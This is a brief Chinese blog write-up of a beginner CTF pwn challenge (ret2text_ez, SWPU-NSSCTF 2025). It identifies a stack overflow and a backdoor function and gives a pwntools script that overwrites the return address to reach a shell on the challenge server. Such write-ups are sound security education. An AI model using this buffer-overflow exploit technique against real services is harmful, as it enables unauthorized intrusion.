2025 SWPU-NSSCTF 秋季招新入门 ret2text_ez

首先查看一下保护措施
image
再用ida打开看一下
image
这里存在栈溢出
image
并且存在后门函数
image

点击查看代码
from pwn import *
io=remote("node5.anna.nssctf.cn",29375)
backdoor=0x401196 
payload=b"A"*(0x20+8)+p64(backdoor)
io.sendline(payload)
io.interactive()
posted @ 2025-09-01 23:44  Rye01R  阅读(34)  评论(0)    收藏  举报